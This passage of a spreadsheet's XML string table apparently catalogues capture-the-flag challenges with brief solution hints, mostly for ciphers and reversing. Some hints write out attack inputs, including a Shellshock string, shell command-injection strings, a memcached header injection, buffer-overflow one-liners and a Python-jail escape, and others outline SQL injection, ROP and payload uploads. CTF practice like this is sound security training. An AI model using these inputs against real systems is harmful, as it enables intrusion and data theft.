    <t xml:space="preserve">You must bypass the regex responsible for filtering user input to appaend and execute your own code. </t>
  </si>
  <si>
    <t>hack Lu CTF</t>
  </si>
  <si>
    <t>Grading Board</t>
  </si>
  <si>
    <t>Sql server has several expression filters in place however it is possible to run a sqli from the attached paper on line 57</t>
  </si>
  <si>
    <t>Rules given in challenge, just translate the encrypted message</t>
  </si>
  <si>
    <t xml:space="preserve">school incident </t>
  </si>
  <si>
    <t xml:space="preserve">md5 </t>
  </si>
  <si>
    <t>grab the md5 password hash from /etc/shadow and use an online md5 table to bruteforce the flag (crypto)</t>
  </si>
  <si>
    <t>https://hashes.org/</t>
  </si>
  <si>
    <t>Module Loader</t>
  </si>
  <si>
    <t>Apache</t>
  </si>
  <si>
    <t>it's possible to traverse the servers contents using file inclusion. Check ../..htaccess which points to a directory. The use the '?module' arguement to reveal the flag</t>
  </si>
  <si>
    <t>Prof. M. Eista Hax</t>
  </si>
  <si>
    <t>Perl</t>
  </si>
  <si>
    <t>execute a payload on the web server</t>
  </si>
  <si>
    <t>leak the source of the website through the email address forum using sqli, Then it is possible to upload and execute your own payloads with some perl trickary</t>
  </si>
  <si>
    <t>3 bits RGB</t>
  </si>
  <si>
    <t>Russian Idioms / XOR</t>
  </si>
  <si>
    <t>Translate the russian words and connect them with colors to form idioms, then translate these colors into 3 bit RGB values then XOR them with the given byte string to get the flag (crypto)</t>
  </si>
  <si>
    <t>cyber criminal</t>
  </si>
  <si>
    <t>Write given text in 8 rows and get the phrase from the cut out cells and ratate the grille CW until you get the flag</t>
  </si>
  <si>
    <t>lazy cryptanalyst</t>
  </si>
  <si>
    <t xml:space="preserve">use quipquip on the given text </t>
  </si>
  <si>
    <t>master of guesswork</t>
  </si>
  <si>
    <t>XOR</t>
  </si>
  <si>
    <t>Script is trying to download from an encrypted URI, read the wiki and guess the scheme with XOR to get the flag</t>
  </si>
  <si>
    <t>giga</t>
  </si>
  <si>
    <t>website calculates hash(secret + message) which is vunerable to length exention attacks</t>
  </si>
  <si>
    <t>https://github.com/iagox86/hash_extender , https://en.wikipedia.org/wiki/Length_extension_attack</t>
  </si>
  <si>
    <t>Boston-key-pary</t>
  </si>
  <si>
    <t>braintree</t>
  </si>
  <si>
    <t>exploit kernel space</t>
  </si>
  <si>
    <t>Bigger is Better</t>
  </si>
  <si>
    <t>Cave Johnson</t>
  </si>
  <si>
    <t>vigenere</t>
  </si>
  <si>
    <t>tools and math</t>
  </si>
  <si>
    <t>to find key: http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx, rumkin http://rumkin.com/tools/cipher/vigenere-keyed.php</t>
  </si>
  <si>
    <t>h4sh3d</t>
  </si>
  <si>
    <t>find length of hash and derive password</t>
  </si>
  <si>
    <t>hardwood floors</t>
  </si>
  <si>
    <t>I &lt;3 Sleeping</t>
  </si>
  <si>
    <t>polybius square</t>
  </si>
  <si>
    <t>construct 5x5 square and solve</t>
  </si>
  <si>
    <t>Julius Save Me</t>
  </si>
  <si>
    <t>use tool</t>
  </si>
  <si>
    <t>http://quipqiup.com/</t>
  </si>
  <si>
    <t>matricies</t>
  </si>
  <si>
    <t>hill cipher</t>
  </si>
  <si>
    <t>hill cipher known plaintext attack, python script</t>
  </si>
  <si>
    <t>sage</t>
  </si>
  <si>
    <t>Misaka Mikoto</t>
  </si>
  <si>
    <t>rail fence cipher</t>
  </si>
  <si>
    <t>http://rumkin.com/tools/cipher/railfence.php</t>
  </si>
  <si>
    <t>Teacher's Pinboard</t>
  </si>
  <si>
    <t>Javascript / Express</t>
  </si>
  <si>
    <t xml:space="preserve">Pickle Exploitation! </t>
  </si>
  <si>
    <t>respiratory sinus arrhythmia</t>
  </si>
  <si>
    <t>Wiener’s attack, python script</t>
  </si>
  <si>
    <t>https://github.com/pablocelayes/rsa-wiener-attack</t>
  </si>
  <si>
    <t>mma ctf</t>
  </si>
  <si>
    <t>priceofeight reloaded</t>
  </si>
  <si>
    <t>Beat the unbeatable game</t>
  </si>
  <si>
    <t>Get the game to an unsolvable 12346578 position. Save the continue key. Reconnect and move tile 5 down (exploit). Save the cont key again and reconnect then shift tile 5 &amp; 6</t>
  </si>
  <si>
    <t>custom xor</t>
  </si>
  <si>
    <t>known plaintext, can solve by hand</t>
  </si>
  <si>
    <t>Basic SQL injection to pass first round. However you can write a script to automate blind sqli and bruteforce the admin password</t>
  </si>
  <si>
    <t>login as admin - 2</t>
  </si>
  <si>
    <t>keycheck-200</t>
  </si>
  <si>
    <t>Find the flag in the memcached server</t>
  </si>
  <si>
    <t>Dump the memchched objects using 'Cookie: %0astats cachedump 0 0' Objects start dumping around a value of 3, focus on objects 20b in lenth and you'll find your flag</t>
  </si>
  <si>
    <t>birthday attack, reverse rsa key</t>
  </si>
  <si>
    <t>CodeGate Junior CTF</t>
  </si>
  <si>
    <t>uploader</t>
  </si>
  <si>
    <t>3doges2</t>
  </si>
  <si>
    <t>cheip</t>
  </si>
  <si>
    <t>c/c++</t>
  </si>
  <si>
    <t>pwn the service</t>
  </si>
  <si>
    <t>TripleDES</t>
  </si>
  <si>
    <t>EDE, bruteforce</t>
  </si>
  <si>
    <t>EDE = encrypt,decrypt,encrypt</t>
  </si>
  <si>
    <t xml:space="preserve">basic buffer overflow to return to backdoor() function </t>
  </si>
  <si>
    <t>even-the-server</t>
  </si>
  <si>
    <t>factor n and guess e(easy value)</t>
  </si>
  <si>
    <t>urandom</t>
  </si>
  <si>
    <t>can you execute the program?</t>
  </si>
  <si>
    <t xml:space="preserve">create an infinte execution loop until /dev/urandom/ spits out a /x00 byte </t>
  </si>
  <si>
    <t>exorcise</t>
  </si>
  <si>
    <t>prophet-said</t>
  </si>
  <si>
    <t>custom substitution</t>
  </si>
  <si>
    <t>Bookstore</t>
  </si>
  <si>
    <t>Write a php script containing a grep command to the flag, begin your script with an alternate php tag that won't get sanitized by the server. Upload your payload and you're golden</t>
  </si>
  <si>
    <t>Can you exploit the bookstore app</t>
  </si>
  <si>
    <t xml:space="preserve">Leak memory using formatted string and exploit function pointer to open keyfile </t>
  </si>
  <si>
    <t>knockers</t>
  </si>
  <si>
    <t>length extension attack</t>
  </si>
  <si>
    <t>Merkle–Damgård construction</t>
  </si>
  <si>
    <t>Mashed Potato</t>
  </si>
  <si>
    <t>mtgo</t>
  </si>
  <si>
    <t>leave your message on the server</t>
  </si>
  <si>
    <t xml:space="preserve">Recover stack cookie then use ROP to gain RCE </t>
  </si>
  <si>
    <t>PEDA</t>
  </si>
  <si>
    <t>Nikoli</t>
  </si>
  <si>
    <t>use sage and python</t>
  </si>
  <si>
    <t>break-in-ctf</t>
  </si>
  <si>
    <t>substitution</t>
  </si>
  <si>
    <t>custom substitution cipher</t>
  </si>
  <si>
    <t>use given frequency table</t>
  </si>
  <si>
    <t>olive and mushroom pizza</t>
  </si>
  <si>
    <t>heisenberg</t>
  </si>
  <si>
    <t>Access flag on server</t>
  </si>
  <si>
    <t xml:space="preserve">Using ROP leak address from GOT, read function pointer and command into .bss and call system() </t>
  </si>
  <si>
    <t>Yañez Sepulveda cipher</t>
  </si>
  <si>
    <t>shell script</t>
  </si>
  <si>
    <t>bsides-vancouver-ctf</t>
  </si>
  <si>
    <t>matasano</t>
  </si>
  <si>
    <t>xor cipher</t>
  </si>
  <si>
    <t>ts-sci-nz</t>
  </si>
  <si>
    <t>Rodent</t>
  </si>
  <si>
    <t>take a look at the ancient server</t>
  </si>
  <si>
    <t>substituion cipher</t>
  </si>
  <si>
    <t>Extract binary from server using '../' trick -&gt; Use ROP to execute system()</t>
  </si>
  <si>
    <t>There is a missing bit in the 'n' value. The correct value 'n' ends with 7709. Use sage to factorize the number</t>
  </si>
  <si>
    <t>Sage</t>
  </si>
  <si>
    <t>Sokoban</t>
  </si>
  <si>
    <t>AES IV</t>
  </si>
  <si>
    <t>extract the flag from binary</t>
  </si>
  <si>
    <t>key is missing 2 chars from it. Pad the key and reverse AES-CBC to retrieve the flag</t>
  </si>
  <si>
    <t>control EIP and go to get_flag()</t>
  </si>
  <si>
    <t xml:space="preserve">I hope you liked National Treasure, because you're going hunting for an RSA key. </t>
  </si>
  <si>
    <t>crypto 500</t>
  </si>
  <si>
    <t>Base 64</t>
  </si>
  <si>
    <t>systemshock</t>
  </si>
  <si>
    <t>Write a simple program containing a BASE64 Char set and an 'allowed' charset. generate two random strings of length 1 - 9999 from the allowed array. Then check the chars, if they match add them to the matching array. Break when no more matching pairs are produced (crypto)</t>
  </si>
  <si>
    <t>exploit the server</t>
  </si>
  <si>
    <t xml:space="preserve">Buffer overflow combined with command injection vulnerability </t>
  </si>
  <si>
    <t>cry100</t>
  </si>
  <si>
    <t>Beaufort Cipher (variation of vigenere cipher)</t>
  </si>
  <si>
    <t>http://www.phrack.org/issues/7/3.html</t>
  </si>
  <si>
    <t>Weff</t>
  </si>
  <si>
    <t>beta test our new website</t>
  </si>
  <si>
    <t>leak libc base due to use after free() then modify binary tree function free_hook() to execute system() on call</t>
  </si>
  <si>
    <t>benders-big-score</t>
  </si>
  <si>
    <t>exploit the binary</t>
  </si>
  <si>
    <t>format string vunerability (exploit)</t>
  </si>
  <si>
    <t>cry200</t>
  </si>
  <si>
    <t>http://pwntools.com/</t>
  </si>
  <si>
    <t>custom XOR</t>
  </si>
  <si>
    <t>cry300</t>
  </si>
  <si>
    <t>AES-XTS</t>
  </si>
  <si>
    <t>use tool to crack password</t>
  </si>
  <si>
    <t>https://github.com/sinfocol/vboxdie-cracker/</t>
  </si>
  <si>
    <t>Overflow 1</t>
  </si>
  <si>
    <t>execute a simple buffer overflow</t>
  </si>
  <si>
    <t xml:space="preserve">simple buffer overflow to set the value of secret to '0x1cec7fff' </t>
  </si>
  <si>
    <t>cry50</t>
  </si>
  <si>
    <t>skytale</t>
  </si>
  <si>
    <t>solve for offset of 7</t>
  </si>
  <si>
    <t>angler</t>
  </si>
  <si>
    <t>Pyshell</t>
  </si>
  <si>
    <t>escape the pyjail</t>
  </si>
  <si>
    <t>disable the banned words filter by emptying the list '(lambda: 1).__globals__['ban' + 'ned'] = []'</t>
  </si>
  <si>
    <t>transposition cipher</t>
  </si>
  <si>
    <t>Cipher forms blocks of 3 characters. Find the correct permutation P of lenth L that will reorganize the letters to form a valid flag (crypto)</t>
  </si>
  <si>
    <t>cross check</t>
  </si>
  <si>
    <t>Message is split using 3 different RSA keys. However you can find the primes of the next two keys fairly easily. From there it's just a case of factorizaion using the fermat method (crypto)</t>
  </si>
  <si>
    <t>FalseCrypt</t>
  </si>
  <si>
    <t>NTRU</t>
  </si>
  <si>
    <t>Bruteforce the polynomials responsible for encrypting the message</t>
  </si>
  <si>
    <t>shocked!</t>
  </si>
  <si>
    <t xml:space="preserve">bash </t>
  </si>
  <si>
    <t>there's something more to this shell</t>
  </si>
  <si>
    <t xml:space="preserve">execute a forkbomb and cat the flag '() { :;}; cat flag.txt' </t>
  </si>
  <si>
    <t>mortal magi agents</t>
  </si>
  <si>
    <t>Golden Metal</t>
  </si>
  <si>
    <t>supernote</t>
  </si>
  <si>
    <t>exploit the note taking app</t>
  </si>
  <si>
    <t xml:space="preserve">exploiting a race condition create a symlink to arbitrary file then have cron execute your arbitrary code </t>
  </si>
  <si>
    <t>Use Msieve to factor the large primes then write a simple script to decrypt the text</t>
  </si>
  <si>
    <t>fermat</t>
  </si>
  <si>
    <t>C/C++</t>
  </si>
  <si>
    <t>guesspw</t>
  </si>
  <si>
    <t>bash</t>
  </si>
  <si>
    <t>access a file you cant open</t>
  </si>
  <si>
    <t>/dev/fd/1,2,3</t>
  </si>
  <si>
    <t>https://github.com/VulnHub/ctf-writeups/blob/master/2015/codegate/guesspw.md</t>
  </si>
  <si>
    <t>leak the website source using various LFI techniques. Then start building your sqli statements to eventually find the proper login credentials</t>
  </si>
  <si>
    <t>motto mijkai address</t>
  </si>
  <si>
    <t>generate an hmac to login as admin</t>
  </si>
  <si>
    <t>Simple Algorithm</t>
  </si>
  <si>
    <t>Very large integer</t>
  </si>
  <si>
    <t>Bruteforce the message according to the provided algorithm</t>
  </si>
  <si>
    <t>ASIS Finals CTF</t>
  </si>
  <si>
    <t>RSASR</t>
  </si>
  <si>
    <t>Factorize the RSA key using a backtrack algorithm (crypro)</t>
  </si>
  <si>
    <t>hello, joe</t>
  </si>
  <si>
    <t>checking functions</t>
  </si>
  <si>
    <t>The exploit is very easy: register two user with random 5-char names, register third user with name equal to xor of two previous usernames and string “admin”. Then xor all session datas and xor all hmacs!</t>
  </si>
  <si>
    <t>take the functions, take the sets each restrict to, and take the intersection</t>
  </si>
  <si>
    <t>the real flag finder</t>
  </si>
  <si>
    <t>x86-64</t>
  </si>
  <si>
    <t>memcmp</t>
  </si>
  <si>
    <t>bodu</t>
  </si>
  <si>
    <t>set breakpoint at address with gdb-peda</t>
  </si>
  <si>
    <t>gdb-peda</t>
  </si>
  <si>
    <t>Use the Boneh Durfree attack to crack the ciphertext</t>
  </si>
  <si>
    <t>binned</t>
  </si>
  <si>
    <t>unrelated fuctions</t>
  </si>
  <si>
    <t>syscall table</t>
  </si>
  <si>
    <t>https://github.com/ctfs/write-ups-2015/blob/master/9447-ctf-2015/steganography/binned/syscall-stego.py</t>
  </si>
  <si>
    <t>Nuit-du-hack-quals ctf</t>
  </si>
  <si>
    <t>facesec</t>
  </si>
  <si>
    <t xml:space="preserve">Upload a .tar containing a sym link to the flag. </t>
  </si>
  <si>
    <t>strpos</t>
  </si>
  <si>
    <t xml:space="preserve"> ==</t>
  </si>
  <si>
    <t>pass an aray through</t>
  </si>
  <si>
    <t>Command line security</t>
  </si>
  <si>
    <t>giloph</t>
  </si>
  <si>
    <t>Read provided manuals and find the problem</t>
  </si>
  <si>
    <t>Provided app is CLI vunerable '; ls;' -&gt; '; cat flat.txt; ' (exploit)</t>
  </si>
  <si>
    <t>TLSv1.2 - SSL</t>
  </si>
  <si>
    <t xml:space="preserve">basis of the attack is a flaw in Diffe-Hellman where your 'P' is vunerable if not chosen properly </t>
  </si>
  <si>
    <t>heartless types</t>
  </si>
  <si>
    <t>Who needs passwords?</t>
  </si>
  <si>
    <t>You need to get min_len == 0, send 255 random chars using python (exploit)</t>
  </si>
  <si>
    <t>Try to guess</t>
  </si>
  <si>
    <t>C / C++</t>
  </si>
  <si>
    <t>Hack the cutting edge RNG</t>
  </si>
  <si>
    <t>Send 2^32-1 twice to cause an integer overflow</t>
  </si>
  <si>
    <t>buffering</t>
  </si>
  <si>
    <t>overflow the stack</t>
  </si>
  <si>
    <t>(python -c "print 'A'*28 + '\x39\x05'") | ./overflow1</t>
  </si>
  <si>
    <t>simple</t>
  </si>
  <si>
    <t>use python to print out a possible list of XOR words, translate the list by hand</t>
  </si>
  <si>
    <t>Cipherception</t>
  </si>
  <si>
    <t>multicipher</t>
  </si>
  <si>
    <t>B64 &gt; Atbash &gt; 8Caesar &gt; 5Affine2</t>
  </si>
  <si>
    <t>power level</t>
  </si>
  <si>
    <t>C / C++ - XOR</t>
  </si>
  <si>
    <t xml:space="preserve">Code calulates a simple encryption using a XOR on the first four letters of the string passed. Bruteforce the given key. </t>
  </si>
  <si>
    <t>zer0-day</t>
  </si>
  <si>
    <t>remove the new lines from the string and decode the base 64 to get the flag (crypto)</t>
  </si>
  <si>
    <t>whiter0se</t>
  </si>
  <si>
    <t>Solve using quipquip</t>
  </si>
  <si>
    <t>bricks of gold</t>
  </si>
  <si>
    <t>Custom CBC cipher</t>
  </si>
  <si>
    <t>http://www.truedigitalsecurity.com/blog/2015/09/22/csaw-2015-crypto-500-bricks-of-gold-writeup/</t>
  </si>
  <si>
    <t>Csaw Finals CTF</t>
  </si>
  <si>
    <t>ransomwhere</t>
  </si>
  <si>
    <t>.img, ruby, AES-CBC</t>
  </si>
  <si>
    <t>create a simple script using the given script as a basis to create the key file at the exact time the seed is generated to get the PNG containing the flag</t>
  </si>
  <si>
    <t>rev50</t>
  </si>
  <si>
    <t>mips</t>
  </si>
  <si>
    <t>mips ref</t>
  </si>
  <si>
    <t>http://www.mrc.uidaho.edu/mrc/people/jff/digital/MIPSir.html</t>
  </si>
  <si>
    <t>rev60</t>
  </si>
  <si>
    <t>TBBPE</t>
  </si>
  <si>
    <t>Ruby - CBC</t>
  </si>
  <si>
    <t>rev70</t>
  </si>
  <si>
    <t>https://github.com/mastahyeti/the-blog/blob/master/solution.md</t>
  </si>
  <si>
    <t>Crack the Hash</t>
  </si>
  <si>
    <t>MD5</t>
  </si>
  <si>
    <t>A quick google search of the hash reveals the password is 'password12345' which is the flag</t>
  </si>
  <si>
    <t>write50</t>
  </si>
  <si>
    <t>much studying</t>
  </si>
  <si>
    <t>i64 and C</t>
  </si>
  <si>
    <t>redacted@shell:/problems/aplit$ ./aplit $(python -c "print 'a'*717")</t>
  </si>
  <si>
    <t>droid80</t>
  </si>
  <si>
    <t>dex</t>
  </si>
  <si>
    <t>unzip apk, dex2jar, jad</t>
  </si>
  <si>
    <t>dex2jar, jad *.jar, jadx -x *.apk</t>
  </si>
  <si>
    <t>Guess the Algorithm</t>
  </si>
  <si>
    <t>Sha1</t>
  </si>
  <si>
    <t>http://www.decompileandroid.com/</t>
  </si>
  <si>
    <t xml:space="preserve">Bust out John the Ripper against the given hash, it'll crack it. </t>
  </si>
  <si>
    <t>John the Ripper</t>
  </si>
  <si>
    <t>One-way</t>
  </si>
  <si>
    <t xml:space="preserve">Since the salt is only 8 chars and the blocksize is 16 chars this makes the CBC encryption equivalent to a simple ECB encyption. Since the system appends a salt to your input the system becomes vunerable to padding attacks. </t>
  </si>
  <si>
    <t>secure60</t>
  </si>
  <si>
    <t>pragyanctf</t>
  </si>
  <si>
    <t>decompile jar</t>
  </si>
  <si>
    <t>http://www.javadecompilers.com/</t>
  </si>
  <si>
    <t>crack this</t>
  </si>
  <si>
    <t>Playfair cipher</t>
  </si>
  <si>
    <t>use the tool</t>
  </si>
  <si>
    <t>http://rumkin.com/tools/cipher/playfair.php</t>
  </si>
  <si>
    <t>asm60</t>
  </si>
  <si>
    <t>read asm</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/X86_assembly_language#Syntax</t>
  </si>
  <si>
    <t>Haunted 1's</t>
  </si>
  <si>
    <t>replace everything that isn't a 0 with 1 and decode binary text</t>
  </si>
  <si>
    <t>one more headache</t>
  </si>
  <si>
    <t>cunstom cipher</t>
  </si>
  <si>
    <t>function60</t>
  </si>
  <si>
    <t>roman</t>
  </si>
  <si>
    <t>cyborg80</t>
  </si>
  <si>
    <t>caesar rot cipher</t>
  </si>
  <si>
    <t>use github script</t>
  </si>
  <si>
    <t>https://github.com/abpolym/crypto-tools/tree/master/rot</t>
  </si>
  <si>
    <t>toast90</t>
  </si>
  <si>
    <t>netsino120</t>
  </si>
  <si>
    <t>rubies on rails</t>
  </si>
  <si>
    <t>interger overflow</t>
  </si>
  <si>
    <t>railfence cipher</t>
  </si>
  <si>
    <t>bit130</t>
  </si>
  <si>
    <t>https://github.com/abpolym/crypto-tools/tree/master/handycode</t>
  </si>
  <si>
    <t>hopper+ida</t>
  </si>
  <si>
    <t>https://retdec.com/decompilation/</t>
  </si>
  <si>
    <t>the impossible</t>
  </si>
  <si>
    <t>police140</t>
  </si>
  <si>
    <t>weak rsa</t>
  </si>
  <si>
    <t>python struct format, pack and unpack</t>
  </si>
  <si>
    <t>obtain public key with openssl, use github script</t>
  </si>
  <si>
    <t>obfuscate150</t>
  </si>
  <si>
    <t>https://github.com/ius/rsatool/blob/master/rsatool.py</t>
  </si>
  <si>
    <t>extreme</t>
  </si>
  <si>
    <t>anti-disassembler</t>
  </si>
  <si>
    <t>anti-disassembler, gdb-peda</t>
  </si>
  <si>
    <t>Decrypt it</t>
  </si>
  <si>
    <t>bitterman-300</t>
  </si>
  <si>
    <t>extend flag to reach encrypted flag 'reset; for i in SECCON\{{{A..z},{0..9}}; do echo $i; ./cryptooo $i; done'</t>
  </si>
  <si>
    <t>Hack In The Box</t>
  </si>
  <si>
    <t>nx enabled</t>
  </si>
  <si>
    <t>bin100</t>
  </si>
  <si>
    <t>leak libc address</t>
  </si>
  <si>
    <t>find the prime numbers</t>
  </si>
  <si>
    <t>Override GLIBC Sleep() and Time() with preload</t>
  </si>
  <si>
    <t>Paillier cipher</t>
  </si>
  <si>
    <t>GDB, IDA Pro, gdbserver, radare2</t>
  </si>
  <si>
    <t>unzip the file</t>
  </si>
  <si>
    <t>asis-calc</t>
  </si>
  <si>
    <t>find backnumber08.txt and backnumber09.txt from previous competition, use tool</t>
  </si>
  <si>
    <t>try all 256bits as input, will expose key</t>
  </si>
  <si>
    <t>pcrack https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html</t>
  </si>
  <si>
    <t>lion-cub</t>
  </si>
  <si>
    <t>last bit is not encrypted, reverse encryption with python script,compression</t>
  </si>
  <si>
    <t>numdroid</t>
  </si>
  <si>
    <t>crib drag</t>
  </si>
  <si>
    <t>satelite-reloaded</t>
  </si>
  <si>
    <t>solve 2-sat formula</t>
  </si>
  <si>
    <t>finish clue and use as xor key</t>
  </si>
  <si>
    <t>i like bacon</t>
  </si>
  <si>
    <t>bacon</t>
  </si>
  <si>
    <t>morse code -&gt; bacon cipher</t>
  </si>
  <si>
    <t>ls</t>
  </si>
  <si>
    <t>HashKiller.co.uk</t>
  </si>
  <si>
    <t>analyze binary, follow execution path, recognize encryption, decrypt pcap</t>
  </si>
  <si>
    <t>linux commands: 'strace' , 'ltrace'. Python 'Salsa20' library, evdev</t>
  </si>
  <si>
    <t>orbb</t>
  </si>
  <si>
    <t>poor writeup: http://l4w.io/2014/12/31c3-ctf-writeups/</t>
  </si>
  <si>
    <t>automata</t>
  </si>
  <si>
    <t>find dead end child</t>
  </si>
  <si>
    <t>clone-technique</t>
  </si>
  <si>
    <t>arguments</t>
  </si>
  <si>
    <t>MD5-2</t>
  </si>
  <si>
    <t>find correct arguments unlocks flag</t>
  </si>
  <si>
    <t>dodoCrackMe</t>
  </si>
  <si>
    <t>strings</t>
  </si>
  <si>
    <t>coney</t>
  </si>
  <si>
    <t>find where root password is compared, unlocks flag</t>
  </si>
  <si>
    <t>rabit</t>
  </si>
  <si>
    <t>online decipher tool</t>
  </si>
  <si>
    <t>QES</t>
  </si>
  <si>
    <t>complete grid of fibonacci and lucas sequence</t>
  </si>
  <si>
    <t>base unknown</t>
  </si>
  <si>
    <t>membership</t>
  </si>
  <si>
    <t>base32</t>
  </si>
  <si>
    <t>DWARF</t>
  </si>
  <si>
    <t>gain control of exception handlers</t>
  </si>
  <si>
    <t>classic crypto</t>
  </si>
  <si>
    <t>ceaser</t>
  </si>
  <si>
    <t>morse code -&gt; ceaser</t>
  </si>
  <si>
    <t>perfect security</t>
  </si>
  <si>
    <t>use phi "golden number" as key</t>
  </si>
  <si>
    <t>rsa 2070</t>
  </si>
  <si>
    <t>minibomb</t>
  </si>
  <si>
    <t>use public key to get p and q of private key</t>
  </si>
  <si>
    <t>buffer size</t>
  </si>
  <si>
    <t>make buffer certain size</t>
  </si>
  <si>
    <t>http://www.factordb.com/index.php?query=79832181757332818552764610761349592984614744432279135328398999801627880283610900361281249973175805069916210179560506497075132524902086881120372213626641879468491936860976686933630869673826972619938321951599146744807653301076026577949579618331502776303983485566046485431039541708467141408260220098592761245010678592347501894176269580510459729633673468068467144199744563731826362102608811033400887813754780282628099443490170016087838606998017490456601315802448567772411623826281747245660954245413781519794295336197555688543537992197142258053220453757666537840276416475602759374950715283890232230741542737319569819793988431443</t>
  </si>
  <si>
    <t>jailbreak</t>
  </si>
  <si>
    <t>allyourbase</t>
  </si>
  <si>
    <t>decode base64</t>
  </si>
  <si>
    <t>hackcon</t>
  </si>
  <si>
    <t>idlovetoturnyouon</t>
  </si>
  <si>
    <t>enigma</t>
  </si>
  <si>
    <t>put in online engima tool</t>
  </si>
  <si>
    <t>steal the diamond</t>
  </si>
  <si>
    <t>script</t>
  </si>
  <si>
    <t>guess</t>
  </si>
  <si>
    <t>poopoooooow</t>
  </si>
  <si>
    <t>rsabin</t>
  </si>
  <si>
    <t>snapstagram</t>
  </si>
  <si>
    <t>AES-CFB</t>
  </si>
  <si>
    <t>feed in a message of length 81, xor convert the last full block of text</t>
  </si>
  <si>
    <t>bad_apple</t>
  </si>
  <si>
    <t>zen_garden</t>
  </si>
  <si>
    <t>heap allocation</t>
  </si>
  <si>
    <t>length extension attack, python script</t>
  </si>
  <si>
    <t>HashPump (https://github.com/bwall/HashPump)</t>
  </si>
  <si>
    <t>hypercube</t>
  </si>
  <si>
    <t>powerpc</t>
  </si>
  <si>
    <t>optimize code</t>
  </si>
  <si>
    <t>pudel</t>
  </si>
  <si>
    <t>r3v3</t>
  </si>
  <si>
    <t>padding oracle attack, poodle SSL vulnerability, python script</t>
  </si>
  <si>
    <t>static analysis</t>
  </si>
  <si>
    <t>Python-paddingoracle (https://github.com/mwielgoszewski/python-paddingoracle)</t>
  </si>
  <si>
    <t>really_slow_arithmetic</t>
  </si>
  <si>
    <t>OpenSSL</t>
  </si>
  <si>
    <t>turbo</t>
  </si>
  <si>
    <t>t9</t>
  </si>
  <si>
    <t>t9 cipher</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
      </rPr>
      <t>upx</t>
    </r>
    <r>
      <t>, hopper, and Z3</t>
    </r>
  </si>
  <si>
    <t>do by hand or find a tool</t>
  </si>
  <si>
    <t>Th3jackers-ctf</t>
  </si>
  <si>
    <t>ohshit</t>
  </si>
  <si>
    <t>hacker_level-200</t>
  </si>
  <si>
    <t>decrpyt cipher with encrypted program</t>
  </si>
  <si>
    <t>printf</t>
  </si>
  <si>
    <t>the last word</t>
  </si>
  <si>
    <t>http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx</t>
  </si>
  <si>
    <t>rarverseme</t>
  </si>
  <si>
    <t>formatStringExploiter</t>
  </si>
  <si>
    <t>rar</t>
  </si>
  <si>
    <t>bruteforce python script</t>
  </si>
  <si>
    <t>python script to descramble QR code</t>
  </si>
  <si>
    <t>aerosol can</t>
  </si>
  <si>
    <t>weird text</t>
  </si>
  <si>
    <t>obfuscation</t>
  </si>
  <si>
    <t>underscores represent missing character, 'cat ec5883451bb7d0aa6b5950e39ed5f16d | while read line; do [[ $line =~ '_' ]] &amp;&amp; printf \\$(printf "%o" $((${#line}+96))) || echo -n $line; done'</t>
  </si>
  <si>
    <t>learn how code works, send correct argument</t>
  </si>
  <si>
    <t>introduction to keylogging</t>
  </si>
  <si>
    <t>substitute keycode with meaning</t>
  </si>
  <si>
    <t>Crypto 1</t>
  </si>
  <si>
    <t>custom ciphere</t>
  </si>
  <si>
    <t>csaw2014reversing2.exe</t>
  </si>
  <si>
    <t>python script to decode chemical names</t>
  </si>
  <si>
    <t>Crypto 2</t>
  </si>
  <si>
    <t>encrypted executable</t>
  </si>
  <si>
    <t>patch executable</t>
  </si>
  <si>
    <t>python script to write ASCII values from message</t>
  </si>
  <si>
    <t>ibteam</t>
  </si>
  <si>
    <t>crypto-2</t>
  </si>
  <si>
    <t>multi-tap ABC</t>
  </si>
  <si>
    <t>tool: http://www.dcode.fr/multitap-abc-cipher</t>
  </si>
  <si>
    <t>opentoall</t>
  </si>
  <si>
    <t>bach</t>
  </si>
  <si>
    <t>Bach crypto</t>
  </si>
  <si>
    <t>eggshells</t>
  </si>
  <si>
    <t>music stuff: http://en.wikipedia.org/wiki/Musical_cryptogram</t>
  </si>
  <si>
    <t>hidden code</t>
  </si>
  <si>
    <t>curl url</t>
  </si>
  <si>
    <t>stream cipher</t>
  </si>
  <si>
    <t xml:space="preserve">XOR each ciphertext with the other ciphertexts to generate all possible combinations and fill in the gaps </t>
  </si>
  <si>
    <t>No Crypto</t>
  </si>
  <si>
    <t>Modify the ciphertext so it decrypts to the given plaintext. A general understanding of AES-CBC is required</t>
  </si>
  <si>
    <t>Custom Function Engineering</t>
  </si>
  <si>
    <t xml:space="preserve">Extract the low bits of the plaintext then decode the ciphertext. You'll need to write a custom solver to do so. </t>
  </si>
  <si>
    <t>casino</t>
  </si>
  <si>
    <t>Vigenere</t>
  </si>
  <si>
    <t>Vigenere Cipher</t>
  </si>
  <si>
    <t>Enter a whole bunch of 'A's the ciphertext and flag is KIWI</t>
  </si>
  <si>
    <t>Online Vigenere Solver</t>
  </si>
  <si>
    <t>Vigenere 2</t>
  </si>
  <si>
    <t>ey</t>
  </si>
  <si>
    <t>Subract the plaintext from the ciphertext knowing that the letters have values A = 0 , Z = 25</t>
  </si>
  <si>
    <t>64 bit integer overflow</t>
  </si>
  <si>
    <t xml:space="preserve">code.openhub.net , </t>
  </si>
  <si>
    <t>Vigenere 3</t>
  </si>
  <si>
    <t>codemess</t>
  </si>
  <si>
    <t>You must find the key length using the providied analysis method, then a simple frequency analysis will solve the problem</t>
  </si>
  <si>
    <t>reverse engineer OpenMP constants, write python script to simulate supplied program</t>
  </si>
  <si>
    <t>openMP, IDAPython</t>
  </si>
  <si>
    <t>whatson</t>
  </si>
  <si>
    <t>x64 elf</t>
  </si>
  <si>
    <t>discover the .elf's interpreter, patch binary</t>
  </si>
  <si>
    <t>phone lock</t>
  </si>
  <si>
    <t>The crypto is md5(salt + password), the salt is given so bruteforce 0000-9999 to find the correct pin</t>
  </si>
  <si>
    <t>phone lock 2</t>
  </si>
  <si>
    <t>we have to fill the Xs in salt with different hex digits, concatenate the answer, MD5, and then check if the first few bytes of the result match the first few bytes of valid. Also the challenege refreshes every few minutes so hopefully you get a small pin number</t>
  </si>
  <si>
    <t>checkcheckcheck</t>
  </si>
  <si>
    <t>Custom Cipher</t>
  </si>
  <si>
    <t>error in crypo logic. It becomes possible to overwrite one XOR's hash with another. Leak the hashes of the 48 different passwords</t>
  </si>
  <si>
    <t>creative cheating</t>
  </si>
  <si>
